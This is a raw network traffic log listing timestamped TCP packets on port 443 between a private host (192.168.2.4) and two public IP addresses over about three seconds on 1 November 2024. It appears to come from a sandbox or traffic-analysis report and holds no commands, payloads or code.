                                                                                                                                                  Nov 1, 2024 10:50:58.506474972 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.506489038 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.506591082 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.506597042 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.506644011 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.507730007 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.507745028 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.507786989 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.507791996 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.507819891 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.507843018 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.509500027 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.509515047 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.509566069 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.509571075 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.509610891 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.551876068 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.551891088 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.551934958 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.551940918 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.551969051 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.551989079 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.599276066 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.599328995 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.599329948 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.599375963 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.605958939 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.605969906 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.605993032 CET49742443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.605998993 CET4434974213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.644670010 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.644718885 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.644789934 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.645603895 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.645632982 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.645689964 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.646424055 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.646442890 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.646508932 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.646519899 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.647476912 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.647485971 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.647531986 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.647640944 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.647658110 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.648617983 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.648626089 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.648675919 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.649152040 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.649175882 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.649220943 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.649276018 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.649286032 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.649369001 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:58.649380922 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.849313974 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.849386930 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.849566936 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.849783897 CET49743443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.849795103 CET44349743104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.866887093 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.866916895 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:58.866990089 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.867253065 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:58.867266893 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.374260902 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.374315023 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.374830008 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.374830961 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.374850988 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.374855042 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.375242949 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.375248909 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.375296116 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.375305891 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.377458096 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.377729893 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.377751112 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.378101110 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.378104925 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.385518074 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.385804892 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.385814905 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.386162043 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.386167049 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.390640974 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.390945911 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.390974045 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.391294956 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.391302109 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504455090 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504473925 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504519939 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.504530907 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504569054 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.504714966 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504754066 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504760027 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.504779100 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504789114 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.504793882 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.504952908 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.505003929 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:59.505451918 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.505532980 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.505569935 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.507033110 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:59.507041931 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507246017 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507534981 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.507546902 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507555962 CET49745443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.507560015 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507860899 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507879019 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507915974 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.507924080 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507935047 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.507977009 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.508924007 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:59.509125948 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:50:59.509155035 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.510354042 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510382891 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.510437965 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510584116 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510610104 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.510653019 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510905981 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510912895 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.510925055 CET49747443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.510927916 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.511349916 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.511363029 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.511778116 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.511792898 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.513096094 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.513122082 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.513170004 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.513295889 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.513307095 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.516221046 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.516238928 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.516274929 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.516280890 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.516319036 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.516469002 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.516474009 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.516483068 CET49746443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.516486883 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.518410921 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.518433094 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.518492937 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.518615007 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.518625975 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.519025087 CET49744443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.519030094 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.521545887 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.521619081 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.521661997 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.521764040 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.521776915 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.521790028 CET49748443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.521795034 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.523789883 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.523799896 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:50:59.523860931 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.523983955 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:50:59.523993015 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.047703981 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.047772884 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.047842026 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.047949076 CET49749443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.047967911 CET44349749104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.118029118 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.118066072 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.118140936 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.118428946 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.118444920 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.244208097 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.246697903 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.249892950 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.251821041 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.289554119 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.300293922 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.300298929 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.300301075 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.302115917 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.302128077 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.302624941 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.302628994 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.302769899 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.302778006 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.303078890 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.303082943 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.303246975 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.303260088 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.303544998 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.303550959 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.303713083 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.303719044 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.303997040 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.304001093 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.346880913 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.351660013 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.351669073 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.355026007 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.355030060 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427496910 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427550077 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427664042 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427670002 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427717924 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.427736998 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427786112 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.427830935 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.427874088 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.430999994 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.431221962 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.431263924 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.454916000 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.454926014 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.454942942 CET49753443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.454947948 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.457304955 CET49751443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.457314968 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.463217974 CET49750443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.463232040 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.471693039 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.471693039 CET49754443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.471707106 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.471714973 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.482930899 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.483031988 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.483107090 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.503921032 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.503921032 CET49752443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.503926992 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.503933907 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.520658016 CET49756443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.520688057 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.520747900 CET49756443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.532958031 CET49757443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.532979012 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.533071995 CET49757443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.536815882 CET49756443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.536829948 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.542376995 CET49758443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.542386055 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.542438030 CET49758443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.552798986 CET49758443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.552814960 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.552938938 CET49757443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.552951097 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.558132887 CET49759443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.558146954 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.558202028 CET49759443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.558444977 CET49759443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.558454990 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.563610077 CET49760443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.563640118 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.563688040 CET49760443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.563848019 CET49760443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:00.563862085 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.724261045 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.724340916 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.725428104 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.725435019 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.725634098 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.726730108 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.726851940 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.726877928 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:00.726943970 CET49755443192.168.2.4104.21.85.194
                                                                                                                                                  Nov 1, 2024 10:51:00.726953983 CET44349755104.21.85.194192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.265769958 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.266189098 CET49756443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.266206980 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.266592026 CET49756443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.266597033 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.294015884 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.294312954 CET49758443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.294322014 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.294672012 CET49758443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.294676065 CET4434975813.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.298851967 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.299014091 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.299257040 CET49759443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.299272060 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.299364090 CET49757443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.299370050 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.299618959 CET49759443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.299623013 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.299741983 CET49757443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.299745083 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.304678917 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.304955959 CET49760443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.304971933 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.305308104 CET49760443192.168.2.413.107.246.45
                                                                                                                                                  Nov 1, 2024 10:51:01.305311918 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.407624006 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.407764912 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                  Nov 1, 2024 10:51:01.407823086 CET49756443192.168.2.413.107.246.45
